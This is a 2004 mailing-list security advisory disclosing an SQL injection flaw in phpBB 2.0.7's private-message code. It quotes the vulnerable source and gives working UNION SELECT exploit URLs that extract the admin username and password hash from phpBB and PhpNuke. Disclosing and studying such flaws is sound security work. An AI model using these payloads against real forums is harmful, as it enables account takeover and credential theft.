lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040326184004.22620.qmail@web21409.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.7 and in older versions]


{================================================================================}
{                              [waraxe-2004-SA#013]   
                          }
{================================================================================}
{                                                     
                          }
{      [ Critical sql injection bug in PhpBB 2.0.7 and
in older versions ]       }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


PhpBB is widely used and very popular forum software,
written in php.
Homepage:  http://www.phpbb.com/



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB 2.0.x is written very carefully and securely.
But even there can be bugs, which
will give to potential malicious attacker sensitive
information from database - admin's
username and password's md5 hash.

So, let's look at original code from privmsg.php line
189:


*************************************************************************************

	// SQL to pull appropriate message, prevents nosey
people
	// reading other peoples messages ... hopefully!
	//
	switch( $folder )
	{
		case 'inbox':
			$l_box_name = $lang['Inbox'];
			$pm_sql_user = "AND pm.privmsgs_to_userid = " .
$userdata['user_id'] . " 
				AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL .
" 
					OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " 
					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL .
" )";
			break;
		case 'outbox':
			$l_box_name = $lang['Outbox'];
			$pm_sql_user = "AND pm.privmsgs_from_userid =  " .
$userdata['user_id'] . " 
				AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL .
" ) ";
			break;
		case 'sentbox':
			$l_box_name = $lang['Sentbox'];
			$pm_sql_user = "AND pm.privmsgs_from_userid =  " .
$userdata['user_id'] . " 
				AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
			break;
		case 'savebox':
			$l_box_name = $lang['Savebox'];
			$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = "
. $userdata['user_id'] . "
					AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL
. " ) 
				OR ( pm.privmsgs_from_userid = " .
$userdata['user_id'] . "
					AND pm.privmsgs_type = " .
PRIVMSGS_SAVED_OUT_MAIL . " ) 
				)";
			break;
		default:
			message_die(GENERAL_ERROR,
$lang['No_such_folder']);
			break;
	}

	//
	// Major query obtains the message ...
	//
	$sql = "SELECT u.username AS username_1, u.user_id AS
user_id_1, u2.username AS username_2, u2.user_id AS
user_id_2, u.user_sig_bbcode_uid, u.user_posts,
u.user_from, u.user_website, u.user_email, u.user_icq,
u.user_aim, u.user_yim, u.user_regdate, u.user_msnm,
u.user_viewemail, u.user_rank, u.user_sig,
u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid,
pmt.privmsgs_text
		FROM " . PRIVMSGS_TABLE . " pm, " .
PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, "
. USERS_TABLE . " u2 
		WHERE pm.privmsgs_id = $privmsgs_id
			AND pmt.privmsgs_text_id = pm.privmsgs_id 
			$pm_sql_user 
			AND u.user_id = pm.privmsgs_from_userid 
			AND u2.user_id = pm.privmsgs_to_userid";

*****************************************************************************

As we can see, for some reason there is "$pm_sql_user
.=" in case of 'savebox'. Funny thing is, that
this little bug can open critical security hole to
forum. First, let's try this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar

and we get error message:

General Error 
  
Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server
version for the right syntax to use near 'foobarAND (
( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t

SELECT u.username AS username_1, u.user_id AS
user_id_1, u2.username AS username_2, u2.user_id AS
user_id_2, u.user_sig_bbcode_uid, u.user_posts,
u.user_from, u.user_website, u.user_email, u.user_icq,
u.user_aim, u.user_yim, u.user_regdate, u.user_msnm,
u.user_viewemail, u.user_rank, u.user_sig,
u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid,
pmt.privmsgs_text FROM phpbb_privmsgs pm,
phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2
WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id =
pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid = 2
AND pm.privmsgs_type = 3 ) OR (
pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 )
) AND u.user_id = pm.privmsgs_from_userid AND
u2.user_id = pm.privmsgs_to_userid

Line : 238
File : D:\apache_wwwroot\phpbb206c\privmsg.php	 

 
Next, if we request this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*

then we don't get any error messages. Now it's time to
do something "useful":

********************[real-life
sploit]********************


http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM phpbb_users WHERE user_level=1 LIMIT 1/*


********************[/real-life
sploit]*******************

and we will see in plaintext admin's username and
password's md5 hash ;)

And to all PhpNuke 6.x and 7.x users, here is
something for you:

http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*



Post Scriptum: 

I really enjoy reading of the PhpBB 2.x code, because
it is written with good style and it's
very secure. To all php programmers - I recommend to
read the file "docs\codingstandards.htm" from
phpbb package, it will help to learn good style of the
programming!




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ]
------------------------------------


__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ